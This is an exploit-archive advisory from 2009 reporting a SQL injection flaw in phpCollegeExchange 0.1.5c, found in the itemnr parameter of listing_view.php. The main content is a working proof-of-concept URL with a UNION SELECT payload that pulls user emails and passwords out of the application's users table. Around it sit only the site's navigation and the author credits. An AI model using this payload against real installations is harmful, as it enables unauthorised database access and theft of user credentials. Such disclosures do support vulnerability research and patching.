[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln
# Published : 2009-06-15
# Author : SirGod
# Previous Title : WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability
# Next Title : vBulletin Radio and TV Player Add-On HTML Injection Vulnerability
#################################################################################################################
[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################
[+] Script homepage : http://phpcollegeex.sourceforge.net/
[+] SQL Injection
http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--
#################################################################################################################
# www.Syue.com [2009-06-15]